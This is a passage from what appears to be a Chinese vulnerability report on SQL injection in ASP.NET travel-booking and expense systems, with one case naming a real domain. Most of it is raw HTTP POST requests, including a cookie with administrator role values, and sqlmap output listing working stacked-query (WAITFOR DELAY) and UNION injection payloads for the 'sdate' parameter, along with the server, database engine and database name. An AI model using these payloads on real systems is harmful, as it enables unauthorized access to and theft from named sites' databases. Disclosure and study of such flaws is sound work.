wvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWCAIBDw8WAh8ABVtDb3B5cmlnaHQgJmNvcHk7IDIwMTQgUGlhb1lvdS5vcmcgYWxsIHJpZ2h0cyByZXNlcnZlZC4g5LiK5rW355ub5Luj5L%2Bh5oGv56eR5oqA5pyJ6ZmQ5YWs5Y%2B4ZGQCAw8PFgIfAAVc5Zyw5Z2A77ya5LiK5rW35biC5rKq5p2%2B5YWs6LevMTM5OeW8hOmdkuW5tOWfjjE0NeWPtzcxMOWupCjlnLDpk4E55Y%2B357q%2F5Lmd5Lqt56uZM%2BWPt%2BWHuuWPoylkZAIFDw8WAh8ABTrnlLXor53vvJowMjEtNTE2OTY0NjbjgIEwMjEtNjc4MDAyMjcg5Lyg55yf77yaMDIxLTUxNjg1ODgyZGQCBw8WAh8ABUs8c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc%2Bc2V0SW50ZXJ2YWwoJ21lc3NhZ2VfdHgoKScsIDMwMDAwKTs8L3NjcmlwdD5kZEaS72QiTXejdAGN7%2FQQ8kdM%2F43BBbYry4H2J%2BmMxhAz&__EVENTVALIDATION=%2FwEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp%2BKL8PsKAmeThYB&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36


1.jpg


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFB2Fsa3NkbGtkZAIFDw8WAh8ABQwwMjEtNjc4MDAyMjdkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFoA88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWCAIBDw8WAh8ABVtDb3B5cmlnaHQgJmNvcHk7IDIwMTQgUGlhb1lvdS5vcmcgYWxsIHJpZ2h0cyByZXNlcnZlZC4g5LiK5rW355ub5Luj5L+h5oGv56eR5oqA5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAVc5Zyw5Z2A77ya5LiK5rW35biC5rKq5p2+5YWs6LevMTM5OeW8hOmdkuW5tOWfjjE0NeWPtzcxMOWupCjlnLDpk4E55Y+357q/5Lmd5Lqt56uZM+WPt+WHuuWPoylkZAIFDw8WAh8ABTrnlLXor53vvJowMjEtNTE2OTY0NjbjgIEwMjEtNjc4MDAyMjcg5Lyg55yf77yaMDIxLTUxNjg1ODgyZGQCBw8WAh8ABUs8c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+c2V0SW50ZXJ2YWwoJ21lc3NhZ2VfdHgoKScsIDMwMDAwKTs8L3NjcmlwdD5kZEaS72QiTXejdAGN7/QQ8kdM/43BBbYry4H2J+mMxhAz&__EVENTVALIDATION=/wEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp+KL8PsKAmeThYB&sdate=2015-6-15');WAITFOR DELAY '0:0:10'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFB2Fsa3NkbGtkZAIFDw8WAh8ABQwwMjEtNjc4MDAyMjdkZAIHDxYCHgdWaXNpYmxlZxYCAgEPDxYCHwAFDUFkbWluaXN0cmF0b3JkZAIJDw8WBB4LTmF2aWdhdGVVcmwFFH4vU3lzdGVtL215aW5mby5hc3B4HwAFDOaIkeeahOS/oeaBr2RkAgsPDxYEHwIFEn4vbWVtYmVyL2V4aXQuYXNweB8ABQzlronlhajpgIDlh7pkZAINDxYCHwAFoA88bGk+PGEgaHJlZj0iIyI+57O757uf566h55CGPC9hPjxpIGNsYXNzPSJpY28wMyI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9TeXN0ZW0vbXlpbmZvLmFzcHgiPsK3IOS8geS4muS/oeaBrzwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0dyb3VwLmFzcHgiPsK3IOmDqOmXqOWIhue7hDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL0ZsYWcuYXNweCI+wrcg6KeS6Imy5p2D6ZmQPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9tZW1iZXIvUGVyc29ubmVsLmFzcHgiPsK3IOWRmOW3peeuoeeQhjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF6aKE5a6aPC9hPjxpIGNsYXNzPSJpY28wMiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9GbGlnaHQvIj7CtyDlm73lhoXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZsaWdodF9pbnQvIj7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWCAIBDw8WAh8ABVtDb3B5cmlnaHQgJmNvcHk7IDIwMTQgUGlhb1lvdS5vcmcgYWxsIHJpZ2h0cyByZXNlcnZlZC4g5LiK5rW355ub5Luj5L+h5oGv56eR5oqA5pyJ6ZmQ5YWs5Y+4ZGQCAw8PFgIfAAVc5Zyw5Z2A77ya5LiK5rW35biC5rKq5p2+5YWs6LevMTM5OeW8hOmdkuW5tOWfjjE0NeWPtzcxMOWupCjlnLDpk4E55Y+357q/5Lmd5Lqt56uZM+WPt+WHuuWPoylkZAIFDw8WAh8ABTrnlLXor53vvJowMjEtNTE2OTY0NjbjgIEwMjEtNjc4MDAyMjcg5Lyg55yf77yaMDIxLTUxNjg1ODgyZGQCBw8WAh8ABUs8c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+c2V0SW50ZXJ2YWwoJ21lc3NhZ2VfdHgoKScsIDMwMDAwKTs8L3NjcmlwdD5kZEaS72QiTXejdAGN7/QQ8kdM/43BBbYry4H2J+mMxhAz&__EVENTVALIDATION=/wEWCgKj1Jz9DQLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCbVztzxT1ROuhNWQV5yGReNW8vbQEp+KL8PsKAmeThYB&sdate=2015-6-15') UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(84)+CHAR(79)+CHAR(88)+CHAR(74)+CHAR(83)+CHAR(113)+CHAR(85)+CHAR(99)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=36
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current database: 'sdpiaoyou'


案例四:http://ryxtrip.com/


POST /Financial/fksq_meb.aspx HTTP/1.1
Host: ryxtrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://ryxtrip.com/Financial/fksq_meb.aspx
Cookie: VERSION=2,0,0,0; BRIDGE_INVITE_0=0; BRIDGE_REFRESH=5000; BRIDGE_CLOCK=1434351705610; BRIDGE_NEED=1; baidu_qiao_v3_count_6031340=1; ASP.NET_SessionId=zbrl5miccffv3gmrupifsgn5; Hm_lvt_da5d85e35ea2fc856fd93df2a2962611=1434351655; Hm_lpvt_da5d85e35ea2fc856fd93df2a2962611=1434351699; tktcookie=memberid=7&truename=dkajsdkj&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin; BRIDGE_R6031340=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3786
__VIEWSTATE=%2FwEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFCGRrYWpzZGtqZGQCBQ8PFgIfAAUMMDIxLTUxMDk2OTU5ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR%2BL1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ%2BL21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABaAPPGxpPjxhIGhyZWY9IiMiPuezu%2Be7n%2BeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg%2BmZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI%2Bwrcg5Zu95YaF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50LyI%2Bwrcg5Zu96ZmF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvVHJhaW4vIj7CtyDngavovabnpag8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuiuouWNleafpeivojwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvT3JkZXIvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvaG90ZWwuYXNweCI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL1JldHVybi5hc3B4Ij7CtyDpgIDnpajorrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3NjZ3FfbGlzdC5hc3B4Ij7CtyDljYfoiLHmlLnmnJ%2ForrDlvZU8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuiuouWNleWuoeaguDwvYT48aSBjbGFzcz0iaWNvMDUiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvQ2hlY2svZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvQ2hlY2svaG90ZWwuYXNweCI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXheaKpeihqDwvYT48aSBjbGFzcz0iaWNvMDYiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvUmVwb3J0L2ZsaWdodC5hc3B4Ij7CtyDpo57mnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL1JlcG9ydC90cmFpbi5hc3B4Ij7CtyDngavovabnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL1JlcG9ydC9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL1JlcG9ydC92aXNhLmFzcHgiPsK3IOetvuivgTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2J4LmFzcHgiPsK3IOS%2FnemZqTwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L290aGVyLmFzcHgiPsK3IOWFtuWugzwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6LSi5Yqh566h55CGPC9hPjxpIGNsYXNzPSJpY28wNyI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvZmtzcV9tZWIuYXNweCI%2Bwrcg5LuY5qy%2B55Sz6K%2B36K6w5b2VPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvcGF5X2hpc3RvcnkuYXNweCI%2Bwrcg5bey5LuY5qy%2B6K6w5b2VPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GaW5hbmNpYWwvb3JkZXJzX2FsbC5hc3B4Ij7CtyDnu7zlkIjnu5%2ForqE8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC94Y2Rfb3JkZXJzLmFzcHgiPsK3IOihjOeoi%2BWNleS6pOaOpTwvYT48L2xpPjwvdWw%2BPC9saT5kAgsPFgIeC18hSXRlbUNvdW50ZmQCDQ9kFggCAQ8PFgIfAAVI5LiK5rW35pel5pyI6KGM6Iiq56m656Wo5Yqh5pyN5Yqh5pyJ6ZmQ5YWs5Y%2B4ICAgICDmsqpJQ1DlpIcxMTA0Mjc2NOWPty0xZGQCAw8PFgIfAAUw5Zyw5Z2A77ya5LiK5rW35biC5aSn5rih5rKz6LevMTcxOOWPt0LluqdCNzA35a6kZGQCBQ8PFgIfAAU655S16K%2Bd77yaMDIxLTUxMDk2OTU5IDAyMS01MTA5NjEwMCAgIOS8oOecn%2B%2B8mjAyMS01MTA2MjA5MGRkAgcPFgIfAAVLPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPnNldEludGVydmFsKCdtZXNzYWdlX3R4KCknLCAzMDAwMCk7PC9zY3JpcHQ%2BZGQLlUfXjIPcz7cRnJLQ7WiqVS6Qk58FN7zSQNz%2B3gjT%2Bw%3D%3D&__EVENTVALIDATION=%2FwEWCgKI3oXRCgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCb8RnfQLgjfBlqC5ElREBfhxqKy8PXOzPeQwVu%2F7scte&sdate=2015%2F6%2F15&edate=2015%2F6%2F15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=7


1.jpg


2.jpg


3.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUKMTE2MDQ5NzAwMQ9kFgICAw9kFgYCAQ9kFgwCAw8PFgIeBFRleHQFCGRrYWpzZGtqZGQCBQ8PFgIfAAUMMDIxLTUxMDk2OTU5ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABaAPPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50LyI+wrcg5Zu96ZmF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9Ib3RlbC8iPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvVHJhaW4vIj7CtyDngavovabnpag8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuiuouWNleafpeivojwvYT48aSBjbGFzcz0iaWNvMDQiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48